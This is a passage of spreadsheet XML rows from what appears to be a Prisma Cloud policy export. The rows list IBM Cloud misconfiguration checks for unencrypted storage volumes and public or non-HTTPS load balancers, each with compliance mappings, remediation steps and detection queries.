https://cloud.ibm.com/docs/vpc?topic=vpc-snapshots-vpc-restore&amp;interface=ui#snapshots-vpc-restore-vol-ui
Create a snapshot for above created storage disk volume following below URL:
https://cloud.ibm.com/docs/vpc?topic=vpc-snapshots-vpc-create&amp;interface=ui#snapshots-vpc-create-from-vol-details
Once a  new snapshot got created, delete the virtual server instance to which the created storage volume/snapshot got attached:
https://cloud.ibm.com/docs/hp-virtual-servers?topic=hp-virtual-servers-remove_vs#delete_vs</t>
        </is>
      </c>
      <c r="Y3353" t="inlineStr"/>
      <c r="Z3353" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-block-storage-snapshot' AND json.rule = encryption equal ignore case provider_managed</t>
        </is>
      </c>
      <c r="AA3353" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3353" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3353" t="inlineStr">
        <is>
          <t>PC-IBM-IBS-1014</t>
        </is>
      </c>
      <c r="AD3353" t="b">
        <v>1</v>
      </c>
      <c r="AE3353" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3353" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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3" t="inlineStr">
        <is>
          <t>4ebee55d-086e-4782-9ce3-6c252b7af27d</t>
        </is>
      </c>
      <c r="AI3353" t="inlineStr">
        <is>
          <t>64bb7aa6-5b22-4f88-838c-1e73c8b68ae3</t>
        </is>
      </c>
      <c r="AJ3353" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3353" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3354">
      <c r="A3354" t="inlineStr">
        <is>
          <t>CSA CCM v4.0.12, HITRUST CSF v.11.2.0, SOC 2, GDPR, Microsoft Cloud Security Benchmark v1, DORA, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, NIST 800-53 Rev 5, CIS v1.1.0 (IBM Cloud) Level 2</t>
        </is>
      </c>
      <c r="B3354" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3354" s="2" t="inlineStr"/>
      <c r="D3354" t="inlineStr"/>
      <c r="E3354" t="inlineStr"/>
      <c r="F3354" t="inlineStr"/>
      <c r="G3354" t="b">
        <v>1</v>
      </c>
      <c r="H33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4" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3354" t="inlineStr">
        <is>
          <t>ibm-vpc-block</t>
        </is>
      </c>
      <c r="K3354" t="inlineStr">
        <is>
          <t>IBM Cloud unattached disk is not encrypted with customer managed key</t>
        </is>
      </c>
      <c r="L3354" t="inlineStr"/>
      <c r="M3354" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3354" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3354" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3354" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3354" t="inlineStr">
        <is>
          <t>Storage</t>
        </is>
      </c>
      <c r="R3354" t="inlineStr">
        <is>
          <t>2.2.4</t>
        </is>
      </c>
      <c r="S3354" t="inlineStr"/>
      <c r="T3354" t="b">
        <v>0</v>
      </c>
      <c r="U3354" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3354" t="inlineStr">
        <is>
          <t>ibm-vpc-block-storage-volume</t>
        </is>
      </c>
      <c r="W3354" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud unattached disks (storage volume) which are not encrypted with customer managed keys. As a best practice, use customer managed keys to encrypt the data and maintain control of your keys and sensitive data.</t>
        </is>
      </c>
      <c r="X3354" t="inlineStr">
        <is>
          <t>A disk (boot storage volume) can be encrypted with customer managed keys only at the time of
creation. Please delete reported data disk following below URL:
https://cloud.ibm.com/docs/vpc?topic=vpc-managing-block-storage&amp;interface=ui#delete
Before deleting a disk, make sure to take snapshot of the disk by attaching it to a virtual
server instance and follow below URL to create a snapshot:
https://cloud.ibm.com/docs/vpc?topic=vpc-snapshots-vpc-create&amp;interface=ui#snapshots-vpc-create-from-vol-details</t>
        </is>
      </c>
      <c r="Y3354" t="inlineStr"/>
      <c r="Z3354" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-block-storage-volume' AND json.rule = volume_attachments[*] size equals 0 and encryption equal ignore case provider_managed</t>
        </is>
      </c>
      <c r="AA3354" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3354" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3354" t="inlineStr">
        <is>
          <t>PC-IBM-IBS-977</t>
        </is>
      </c>
      <c r="AD3354" t="b">
        <v>1</v>
      </c>
      <c r="AE3354" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3354" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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4" t="inlineStr">
        <is>
          <t>60b1b421-126f-49a9-bad7-ff1a9696ca01</t>
        </is>
      </c>
      <c r="AI3354" t="inlineStr">
        <is>
          <t>3baaf5fa-ea2d-44a6-b2ea-39ce2a2f5e9d</t>
        </is>
      </c>
      <c r="AJ3354" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3354" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3355">
      <c r="A3355" t="inlineStr">
        <is>
          <t>CSA CCM v4.0.12, HITRUST CSF v.11.2.0, SOC 2, Microsoft Cloud Security Benchmark v1, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2024.2, CIS v1.1.0 (IBM Cloud) Level 2, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3355" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3355" s="2" t="inlineStr"/>
      <c r="D3355" t="inlineStr"/>
      <c r="E3355" t="inlineStr"/>
      <c r="F3355" t="inlineStr"/>
      <c r="G3355" t="b">
        <v>1</v>
      </c>
      <c r="H33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5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3355" t="inlineStr">
        <is>
          <t>ibm-vpc-block</t>
        </is>
      </c>
      <c r="K3355" t="inlineStr">
        <is>
          <t>IBM Cloud Block Storage volume for VPC is not encrypted with BYOK</t>
        </is>
      </c>
      <c r="L3355" t="inlineStr"/>
      <c r="M3355" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3355" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3355" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3355" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3355" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R3355" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S3355" t="inlineStr"/>
      <c r="T3355" t="b">
        <v>0</v>
      </c>
      <c r="U3355" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3355" t="inlineStr">
        <is>
          <t>ibm-vpc-block-storage-volume</t>
        </is>
      </c>
      <c r="W3355" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Block storage volumes that are not encrypted with Bring Your Own keys(BYOK). As a best practice, it is recommended to use BYOK so that no one outside the organization has access to the root key and only authorized identities have access to maintain the lifecycle of the keys.</t>
        </is>
      </c>
      <c r="X3355" t="inlineStr">
        <is>
          <t>A storage volume can be encrypted with BYOK only at the time of creation. Please
Create a snapshot using the below URL:
https://cloud.ibm.com/docs/vpc?topic=vpc-snapshots-vpc-create&amp;interface=ui#snapshots-vpc-create-from-vol-details
Please create a storage volume from the above-created snapshot with BYOK, refer to below URL:
https://cloud.ibm.com/docs/vpc?topic=vpc-snapshots-vpc-restore&amp;interface=ui#snapshots-vpc-restore-snaphot-list-ui
1. Under the 'Encryption at rest' section, select 'Key Protect'.
2. Under 'Encryption service instance' and 'Key name', select the instance and key to be used for encryption.
3. Click 'Create block storage volume' button. The side panel closes, and a message indicate the restored volume.
Please delete the reported block storage volume using the below URL:
https://cloud.ibm.com/docs/vpc?topic=vpc-managing-block-storage&amp;interface=ui#delete</t>
        </is>
      </c>
      <c r="Y3355" t="inlineStr"/>
      <c r="Z3355" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'ibm-vpc-block-storage-volume' as X; config from cloud.resource where api.name = 'ibm-key-protect-registration' as Y;filter 'not($.Y.resourceCrn equals $.X.crn)' ; show X;</t>
        </is>
      </c>
      <c r="AA3355" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3355" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3355" t="inlineStr">
        <is>
          <t>PC-IBM-IBS-1095</t>
        </is>
      </c>
      <c r="AD3355" t="b">
        <v>1</v>
      </c>
      <c r="AE3355" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3355" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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5" t="inlineStr">
        <is>
          <t>54d9a16a-da9a-4fe1-b79f-4feb53661b2c</t>
        </is>
      </c>
      <c r="AI3355" t="inlineStr">
        <is>
          <t>11fa5446-b5df-4aca-9ff6-4c74e715b7e1</t>
        </is>
      </c>
      <c r="AJ3355" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3355" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3356">
      <c r="A3356" t="inlineStr">
        <is>
          <t>CSA CCM v4.0.12, HITRUST CSF v.11.2.0, SOC 2, CIS v1.1.0 (IBM Cloud) Level 2, GDPR, Microsoft Cloud Security Benchmark v1, DORA, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3356" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3356" s="2" t="inlineStr"/>
      <c r="D3356" t="inlineStr"/>
      <c r="E3356" t="inlineStr"/>
      <c r="F3356" t="inlineStr"/>
      <c r="G3356" t="b">
        <v>1</v>
      </c>
      <c r="H33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6" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3356" t="inlineStr">
        <is>
          <t>ibm-vpc-block</t>
        </is>
      </c>
      <c r="K3356" t="inlineStr">
        <is>
          <t>IBM Cloud data disk is not encrypted with customer managed key</t>
        </is>
      </c>
      <c r="L3356" t="inlineStr"/>
      <c r="M3356" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3356" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3356" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3356" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3356" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R3356" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S3356" t="inlineStr"/>
      <c r="T3356" t="b">
        <v>0</v>
      </c>
      <c r="U3356" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3356" t="inlineStr">
        <is>
          <t>ibm-vpc-block-storage-volume</t>
        </is>
      </c>
      <c r="W3356" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud data storage volumes attached to a virtual server instance which are not encrypted with customer managed keys. As a best practice, use customer managed keys to encrypt the data and maintain control of your keys and sensitive data.</t>
        </is>
      </c>
      <c r="X3356" t="inlineStr">
        <is>
          <t>A storage volume can be encrypted with customer managed keys only at the time of creation. Please
create a snapshot following below url:
https://cloud.ibm.com/docs/vpc?topic=vpc-snapshots-vpc-create&amp;interface=ui#snapshots-vpc-create-from-vol-details
Please create a storage volume from the above created snapshot with customer managed encryption:
1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'VPC Infrastructure' and then 'Virtual server instance'
3. From the list, click on the name of an instance. The instance must be in a Running state.
4. On the Instance details page, scroll to the list of Storage volumes and click 'Attach'.
    A side panel opens for you to define the volume attachment.
5. From the Attach data volume panel, expand the list of Block volumes and select 'Create a data volume'.
6. Select 'Import from snapshot'. Expand the Snapshot list and select a snapshot.
7. Optionally, increase the size of the volume within the specified range.
8. Under 'Encryption' section, select either 'Key protect' or 'Hyper Protect Crypto Services'.
9. Under 'Encryption service instance' and 'Key name', select the instance and key to be used for encryption.
10.Click Save. The side panel closes and messages indicate that the restored volume is being attached to the instance.
Please delete reported data disk following below url:
https://cloud.ibm.com/docs/vpc?topic=vpc-managing-block-storage&amp;interface=ui#delete</t>
        </is>
      </c>
      <c r="Y3356" t="inlineStr"/>
      <c r="Z3356" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-block-storage-volume' AND json.rule = volume_attachments[*] size greater than 0 and volume_attachments[*].type equals data and encryption equal ignore case provider_managed</t>
        </is>
      </c>
      <c r="AA3356" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3356" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3356" t="inlineStr">
        <is>
          <t>PC-IBM-IBS-976</t>
        </is>
      </c>
      <c r="AD3356" t="b">
        <v>1</v>
      </c>
      <c r="AE3356" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3356" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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6" t="inlineStr">
        <is>
          <t>99f6ef08-f6fe-415a-8e09-b46d3b0417ff</t>
        </is>
      </c>
      <c r="AI3356" t="inlineStr">
        <is>
          <t>c3e60e4d-11aa-4b67-b4c3-9f831ff3a19c</t>
        </is>
      </c>
      <c r="AJ3356" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3356" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3357">
      <c r="A3357" t="inlineStr">
        <is>
          <t>CSA CCM v4.0.12, HITRUST CSF v.11.2.0, SOC 2, GDPR, Microsoft Cloud Security Benchmark v1, DORA, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, CIS v1.1.0 (IBM Cloud) Level 2, SOC 2, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3357" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3357" s="2" t="inlineStr"/>
      <c r="D3357" t="inlineStr"/>
      <c r="E3357" t="inlineStr"/>
      <c r="F3357" t="inlineStr"/>
      <c r="G3357" t="b">
        <v>1</v>
      </c>
      <c r="H335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7" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3357" t="inlineStr">
        <is>
          <t>ibm-vpc-block</t>
        </is>
      </c>
      <c r="K3357" t="inlineStr">
        <is>
          <t>IBM Cloud OS disk is not encrypted with customer managed keys</t>
        </is>
      </c>
      <c r="L3357" t="inlineStr"/>
      <c r="M3357" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3357" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3357" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3357" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3357" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R3357" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S3357" t="inlineStr"/>
      <c r="T3357" t="b">
        <v>0</v>
      </c>
      <c r="U3357" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3357" t="inlineStr">
        <is>
          <t>ibm-vpc-block-storage-volume</t>
        </is>
      </c>
      <c r="W3357" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud OS disk attached to a virtual server instance which are not encrypted with customer managed keys. As a best practice, use customer managed keys to encrypt the data and maintain control of your keys and sensitive data.</t>
        </is>
      </c>
      <c r="X3357" t="inlineStr">
        <is>
          <t>A os disk(boot storage volume) can be encrypted with customer managed keys only at the time of creation of virtual server instance. Please
create a snapshot for reported os data disk following below url:
https://cloud.ibm.com/docs/vpc?topic=vpc-snapshots-vpc-create&amp;interface=ui#snapshots-vpc-create-from-vol-details
Please create a virtual service instance with os disk from the above created snapshot with customer managed encryption:
https://cloud.ibm.com/docs/vpc?topic=vpc-snapshots-vpc-restore&amp;interface=ui#snapshots-vpc-restore-vol-ui
Once new virtual server instance got created, delete the virtual server instance to which reported os disk got attached:
https://cloud.ibm.com/docs/hp-virtual-servers?topic=hp-virtual-servers-remove_vs#delete_vs
Note: Please note deleting a virtual server instance is irreversible make sure to backup any required data.</t>
        </is>
      </c>
      <c r="Y3357" t="inlineStr"/>
      <c r="Z3357" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-block-storage-volume' AND json.rule = volume_attachments[*] size greater than 0 and volume_attachments[*].type equals boot and encryption equal ignore case provider_managed</t>
        </is>
      </c>
      <c r="AA3357" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3357" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3357" t="inlineStr">
        <is>
          <t>PC-IBM-IBS-975</t>
        </is>
      </c>
      <c r="AD3357" t="b">
        <v>1</v>
      </c>
      <c r="AE3357" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3357" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG335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7" t="inlineStr">
        <is>
          <t>2063f206-99b0-42d4-8abf-650c6d788b9b</t>
        </is>
      </c>
      <c r="AI3357" t="inlineStr">
        <is>
          <t>20c1f067-447f-4d1a-af21-bc404ae66b94</t>
        </is>
      </c>
      <c r="AJ3357" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3357" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3358">
      <c r="A3358" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B3358" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3358" s="2" t="inlineStr"/>
      <c r="D3358" t="inlineStr"/>
      <c r="E3358" t="inlineStr"/>
      <c r="F3358" t="inlineStr"/>
      <c r="G3358" t="b">
        <v>0</v>
      </c>
      <c r="H335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8" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3358" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3358" t="inlineStr">
        <is>
          <t>Copy of IBM Cloud Application Load Balancer for VPC has public access enabled</t>
        </is>
      </c>
      <c r="L3358" t="inlineStr"/>
      <c r="M3358" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3358" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3358" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3358" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3358" t="inlineStr">
        <is>
          <t>TA0001</t>
        </is>
      </c>
      <c r="R3358" t="inlineStr">
        <is>
          <t>T1190 - Exploit Public-Facing Application (TA0001)</t>
        </is>
      </c>
      <c r="S3358" t="inlineStr"/>
      <c r="T3358" t="b">
        <v>0</v>
      </c>
      <c r="U3358" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3358" t="inlineStr">
        <is>
          <t>ibm-vpc-loadbalancer</t>
        </is>
      </c>
      <c r="W3358" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Application Load Balancer for VPC which has public access enabled. Creating a load balancer with public access will lead to unexpected malicious requests getting sent to the public DNS address assigned. A private load balancer is only accessible from within a specific virtual private cloud (VPC). It is highly recommended to use load balancers of type private to protect from unauthorized access.</t>
        </is>
      </c>
      <c r="X3358" t="inlineStr">
        <is>
          <t>A Load balancer can be made private only at the time of creation. To create a private application
load balancer, follow below URL:
https://cloud.ibm.com/docs/vpc?topic=vpc-load-balancer&amp;interface=ui
Make sure to select 'Private' for load balancer 'Type' under 'details' section.
Note: Please make sure to create new load balancer in accordance with alerted resource.
Also update load balancer reference at all the clients/places of usage with newly created
load balancer.</t>
        </is>
      </c>
      <c r="Y3358" t="inlineStr"/>
      <c r="Z3358" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-loadbalancer' AND json.rule = profile.family equal ignore case "application" and operating_status equal ignore case "online" and is_public is true</t>
        </is>
      </c>
      <c r="AA3358" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB3358" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3358" t="inlineStr"/>
      <c r="AD3358" t="b">
        <v>0</v>
      </c>
      <c r="AE3358" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3358" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG335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8" t="inlineStr">
        <is>
          <t>4dc16595-c33d-485d-ba82-0893bac11c56</t>
        </is>
      </c>
      <c r="AI3358" t="inlineStr">
        <is>
          <t>a4bea3f0-0195-4a54-be94-405cf464b659</t>
        </is>
      </c>
      <c r="AJ3358" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3358" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3359">
      <c r="A3359" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, TX-RAMP Level 2, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, SOC 2</t>
        </is>
      </c>
      <c r="B3359" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3359" s="2" t="inlineStr"/>
      <c r="D3359" t="inlineStr"/>
      <c r="E3359" t="inlineStr"/>
      <c r="F3359" t="inlineStr"/>
      <c r="G3359" t="b">
        <v>1</v>
      </c>
      <c r="H33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59" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3359" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3359" t="inlineStr">
        <is>
          <t>IBM Cloud Application Load Balancer for VPC has public access enabled</t>
        </is>
      </c>
      <c r="L3359" t="inlineStr"/>
      <c r="M3359" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3359" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3359" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3359" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3359" t="inlineStr">
        <is>
          <t>C1</t>
        </is>
      </c>
      <c r="R3359" t="inlineStr">
        <is>
          <t>C1.1</t>
        </is>
      </c>
      <c r="S3359" t="inlineStr"/>
      <c r="T3359" t="b">
        <v>0</v>
      </c>
      <c r="U3359" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3359" t="inlineStr">
        <is>
          <t>ibm-vpc-loadbalancer</t>
        </is>
      </c>
      <c r="W3359" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Application Load Balancer for VPC which has public access enabled. Creating a load balancer with public access will lead to unexpected malicious requests getting sent to the public DNS address assigned. A private load balancer is only accessible from within a specific virtual private cloud (VPC). It is highly recommended to use load balancers of type private to protect from unauthorized access.</t>
        </is>
      </c>
      <c r="X3359" t="inlineStr">
        <is>
          <t>A Load balancer can be made private only at the time of creation. To create a private application
load balancer, follow below URL:
https://cloud.ibm.com/docs/vpc?topic=vpc-load-balancer&amp;interface=ui
Make sure to select 'Private' for load balancer 'Type' under 'details' section.
Note: Please make sure to create new load balancer in accordance with alerted resource.
Also update load balancer reference at all the clients/places of usage with newly created
load balancer.</t>
        </is>
      </c>
      <c r="Y3359" t="inlineStr"/>
      <c r="Z3359" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-loadbalancer' AND json.rule = profile.family equal ignore case "application" and operating_status equal ignore case "online" and is_public is true</t>
        </is>
      </c>
      <c r="AA3359" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3359" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3359" t="inlineStr">
        <is>
          <t>PC-IBM-LBV-973</t>
        </is>
      </c>
      <c r="AD3359" t="b">
        <v>1</v>
      </c>
      <c r="AE3359" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3359" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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59" t="inlineStr">
        <is>
          <t>585fd941-88ca-4c5d-b79b-961ca61fd2ea</t>
        </is>
      </c>
      <c r="AI3359" t="inlineStr">
        <is>
          <t>a4bea3f0-0195-4a54-be94-405cf464b659</t>
        </is>
      </c>
      <c r="AJ3359" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3359" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3360">
      <c r="A3360" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, GDPR, DORA, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, Microsoft Cloud Security Benchmark v1, SOC 2, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B3360" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3360" s="2" t="inlineStr"/>
      <c r="D3360" t="inlineStr"/>
      <c r="E3360" t="inlineStr"/>
      <c r="F3360" t="inlineStr"/>
      <c r="G3360" t="b">
        <v>1</v>
      </c>
      <c r="H336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0" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3360" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3360" t="inlineStr">
        <is>
          <t>IBM Cloud Application Load Balancer for VPC has backend pool with health check protocol not configured with HTTPS</t>
        </is>
      </c>
      <c r="L3360" t="inlineStr"/>
      <c r="M3360" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3360" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3360" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3360" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3360" t="inlineStr">
        <is>
          <t>Technological Controls</t>
        </is>
      </c>
      <c r="R3360" t="inlineStr">
        <is>
          <t>A8.1</t>
        </is>
      </c>
      <c r="S3360" t="inlineStr"/>
      <c r="T3360" t="b">
        <v>0</v>
      </c>
      <c r="U3360" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3360" t="inlineStr">
        <is>
          <t>ibm-vpc-loadbalancer</t>
        </is>
      </c>
      <c r="W3360" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Application Load Balancers for VPC that has different health check protocol instead of HTTPS. HTTPS pools uses TLS(SSL) to encrypt normal HTTP requests and responses. It is highly recommended to use application load balancers with HTTPS backend pools for additional security.</t>
        </is>
      </c>
      <c r="X3360" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud Console 
2. Click on 'Menu Icon' and navigate to 'VPC Infrastructure' and then 'Load balancers'
3. Select the 'Load balancers' reported in the alert
4. Under ‘Back-end pools' tab, click on three dots on the right corner of a row containing back-end pool with health check protocol other than HTTPS. Then click on 'Edit’
5. In the 'Edit back-end pool' screen, under 'Health check' section, select 'HTTPS' from the 'Health protocol' dropdown.
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y3360" t="inlineStr"/>
      <c r="Z3360" t="inlineStr">
        <is>
